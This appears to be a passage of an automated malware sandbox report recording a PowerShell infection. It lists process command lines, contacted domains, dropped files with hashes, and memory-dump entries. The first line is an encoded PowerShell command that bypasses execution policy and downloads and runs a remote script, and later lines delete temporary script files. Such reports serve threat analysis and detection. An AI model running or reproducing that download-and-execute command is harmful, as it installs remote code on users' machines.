powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 2no.co udp
N/A 88.99.66.31:443 2no.co tcp
N/A 8.8.8.8:53 raw.githubusercontent.com udp
N/A 185.199.108.133:443 raw.githubusercontent.com tcp
N/A 8.8.8.8:53 www.speedtest.net udp
N/A 151.101.2.219:80 www.speedtest.net tcp
N/A 151.101.2.219:443 www.speedtest.net tcp
N/A 151.101.2.219:80 www.speedtest.net tcp
N/A 8.8.8.8:53 c.speedtest.net udp
N/A 151.101.2.219:443 c.speedtest.net tcp
N/A 8.8.8.8:53 speedtest.kabeltex.nl udp
N/A 82.151.33.2:8080 speedtest.kabeltex.nl tcp
N/A 8.8.8.8:53 speedtest.zeelandnet.nl udp
N/A 212.115.192.180:8080 speedtest.zeelandnet.nl tcp
N/A 8.8.8.8:53 speedtest.worldstream.nl udp
N/A 185.182.195.78:8080 speedtest.worldstream.nl tcp
N/A 8.8.8.8:53 speedtest.caiw.net udp
N/A 62.45.44.26:8080 speedtest.caiw.net tcp
N/A 8.8.8.8:53 aasouv636d.cn udp
N/A 206.188.197.203:443 aasouv636d.cn tcp

Files

memory/3916-114-0x000001A5BC590000-0x000001A5BC9B0000-memory.dmp

memory/3916-116-0x000001A5BC150000-0x000001A5BC152000-memory.dmp

memory/3916-118-0x000001A5BC155000-0x000001A5BC156000-memory.dmp

memory/3916-117-0x000001A5BC153000-0x000001A5BC155000-memory.dmp

memory/3916-119-0x000001A5BC156000-0x000001A5BC157000-memory.dmp

memory/3668-120-0x0000000000000000-mapping.dmp

memory/3668-125-0x000001791DD40000-0x000001791DD41000-memory.dmp

memory/3668-128-0x000001791E050000-0x000001791E051000-memory.dmp

memory/3668-129-0x000001791DDC0000-0x000001791DDC2000-memory.dmp

memory/3668-130-0x000001791DDC3000-0x000001791DDC5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ready.ps1

MD5 3447df88de7128bdc34942334b2fab98
SHA1 519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA256 9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA512 2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

memory/1300-136-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\zfhdxg5m\zfhdxg5m.cmdline

MD5 1beeba88aa06c9ccfc2eb492a3480184
SHA1 e2fab8ebd651a0f3bbfb5091e8ba1e0da570aaa4
SHA256 fa1faab8896afddb38ce7365397017b2f147bd2b172ca2198eb605680e5b986d
SHA512 af6028a0e9cf69e35814d387ef702ad1a253a32766e0c6e29b4271e4fa0a10f25f9f1141e8b8aadbf07436cb53781538017cc6c6c22ca48c870b4d1496f7a2c8

\??\c:\Users\Admin\AppData\Local\Temp\zfhdxg5m\zfhdxg5m.0.cs

MD5 4864fc038c0b4d61f508d402317c6e9a
SHA1 72171db3eea76ecff3f7f173b0de0d277b0fede7
SHA256 0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA512 9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

memory/1904-139-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\zfhdxg5m\CSCFAC60B4AB7C947009A3AFB3947D1A5FC.TMP

MD5 95168593db67746dd8c9d02f2ae09598
SHA1 20eda3f80444df0bc160f5b0d0ab4fa820618442
SHA256 fd09f4efd132c3db937fb45de242d5e7e3c392e5fe0a463cfd3ddd0d31f88c7f
SHA512 5e56ec1e41c8a3598aca2f02e83e27d515756ae3e89a622dcbebe672476e66e7a7103da610a14efaa0ff254d91dceb17228b9fdd9ca4132b8ac28b46429fc794

C:\Users\Admin\AppData\Local\Temp\RES6C3D.tmp

MD5 61a26cc967cbe792b4ed22638776f04c
SHA1 b1223787103eaafaabe6d1d3f66c31b50dd0c9b9
SHA256 a3ec92ea114aa024a825046dee49cf3a82343305da4bc41885fc2704012b4ce6
SHA512 099b63da57b49e4dbbc0acec1592841c59268d35d0920b835fdc8be6be7b23a27a0027ce24404c95be54720bd2474e39063b323e05387cde4bd9b639ba98d20f

C:\Users\Admin\AppData\Local\Temp\zfhdxg5m\zfhdxg5m.dll

MD5 ac3ef7653d1f1794c99d0cfcdecb5287
SHA1 02b0d8cbfee43ceec86cb8e20315b77e3bc58237
SHA256 bbd4ce87c6375af22b2b96d5af290627013066c5afca43266546c0e0b01c3bf3
SHA512 69c3e361d8e65498bdd016f4c600b8cd5959e973a28ded6cbefa3cc0186c18c8f8e9fb367231eecc2609325ea8ca9a9c39b3c03f7131294a2100fc89d46a0517

memory/3668-143-0x000001791DDA0000-0x000001791DDA1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

MD5 2ac58884a6bc6115ac734d8f7e9dcff5
SHA1 7f1a83359e741a82aae8ead8f1b2dd67e76d93a5
SHA256 a328305f6d633db8b9de84d59a608d477d58b6c78b6f26a57303ced1d1acbf53
SHA512 dacfdeafe0e5e5370a3f8a49ec4505840508888c642310b6e482b7559116948145682e9b3964617734a74dfa9ecfddf0b7bf90f7751c34d7d08f6b6d6d800d4c

memory/3668-145-0x000001791DDC6000-0x000001791DDC8000-memory.dmp

memory/3668-146-0x000001791DDC8000-0x000001791DDC9000-memory.dmp

memory/3668-152-0x000001791E800000-0x000001791E801000-memory.dmp

memory/3668-153-0x000001791EB90000-0x000001791EB91000-memory.dmp

memory/2064-160-0x0000000000000000-mapping.dmp

memory/2064-167-0x0000016EBD9E3000-0x0000016EBD9E5000-memory.dmp

memory/2064-166-0x0000016EBD9E0000-0x0000016EBD9E2000-memory.dmp

memory/2064-193-0x0000016EBD9E6000-0x0000016EBD9E8000-memory.dmp

memory/2088-202-0x0000000000000000-mapping.dmp

memory/2064-216-0x0000016EBD9E8000-0x0000016EBD9EA000-memory.dmp

memory/2088-219-0x0000013571D13000-0x0000013571D15000-memory.dmp

memory/2088-221-0x0000013571D16000-0x0000013571D18000-memory.dmp

memory/2088-217-0x0000013571D10000-0x0000013571D12000-memory.dmp

memory/3848-245-0x0000000000000000-mapping.dmp

memory/3848-273-0x000002113D340000-0x000002113D342000-memory.dmp

memory/2088-272-0x0000013571D18000-0x0000013571D1A000-memory.dmp

memory/3848-274-0x000002113D343000-0x000002113D345000-memory.dmp

memory/3848-275-0x000002113D346000-0x000002113D348000-memory.dmp

memory/3848-288-0x000002113D348000-0x000002113D34A000-memory.dmp

memory/3252-298-0x0000000000000000-mapping.dmp

memory/2176-299-0x0000000000000000-mapping.dmp

memory/3976-300-0x0000000000000000-mapping.dmp

memory/2200-337-0x0000000000000000-mapping.dmp

memory/2232-338-0x0000000000000000-mapping.dmp

memory/1072-341-0x0000000000000000-mapping.dmp

memory/2156-342-0x0000000000000000-mapping.dmp

memory/1636-343-0x0000000000000000-mapping.dmp

memory/1832-344-0x0000000000000000-mapping.dmp

memory/1432-345-0x0000000000000000-mapping.dmp

memory/3100-346-0x0000000000000000-mapping.dmp

memory/4000-347-0x0000000000000000-mapping.dmp

memory/3884-348-0x0000000000000000-mapping.dmp

\Windows\Branding\mediasrv.png

MD5 3a434e30924f88a47fa7fc31e1821106
SHA1 b0d245fb30c2b311a2cdf7998c5109a2151cf5a4
SHA256 c1908713db3a7c8fa0dda2f4a332b00b7082910a08704d4b37b26f39f4712b28
SHA512 74c0a5382a725c78db73b9dcc71445747b05171dda27c21d6688800323fb3daf365d6ce05259415db7e7504f42e401a2535a25eefa49988c605ae2853413e84e

\Windows\Branding\mediasvc.png

MD5 c174d5f4b03f158ed3c3ac6579bc9d9f
SHA1 9a3f5c59cdcefe0097accab914e1896030e40e62
SHA256 7ed9b5536d19ad840881d068719dbc95da230bf00ba647bf1340bc5666daf2c7
SHA512 8ebd5f4a064c960eaaf0d5be4fe1463aa85e092bf4a3f81d05bb14df6e5400c80a5018a1c2a0d94f4618ce032b41567e66d0f328b443c13e09ac9e0110004f17

memory/1852-351-0x0000000000000000-mapping.dmp

memory/368-352-0x0000000000000000-mapping.dmp

memory/2184-353-0x0000000000000000-mapping.dmp

memory/3876-354-0x0000000000000000-mapping.dmp

memory/2008-355-0x0000000000000000-mapping.dmp

memory/1636-356-0x0000000000000000-mapping.dmp

memory/344-357-0x0000000000000000-mapping.dmp

memory/1168-358-0x0000000000000000-mapping.dmp

memory/368-359-0x0000000000000000-mapping.dmp

memory/3704-360-0x0000000000000000-mapping.dmp

memory/1652-361-0x0000000000000000-mapping.dmp

memory/684-362-0x0000000000000000-mapping.dmp

memory/2696-363-0x0000000000000000-mapping.dmp

memory/3872-364-0x0000000000000000-mapping.dmp

memory/1208-365-0x0000000000000000-mapping.dmp

memory/2268-366-0x0000000000000000-mapping.dmp

memory/2268-377-0x00000245632F0000-0x00000245632F2000-memory.dmp

memory/2268-378-0x00000245632F3000-0x00000245632F5000-memory.dmp

memory/2268-381-0x00000245632F6000-0x00000245632F8000-memory.dmp

memory/2268-432-0x00000245632F8000-0x00000245632F9000-memory.dmp

memory/4000-445-0x0000000000000000-mapping.dmp

memory/2076-446-0x0000000000000000-mapping.dmp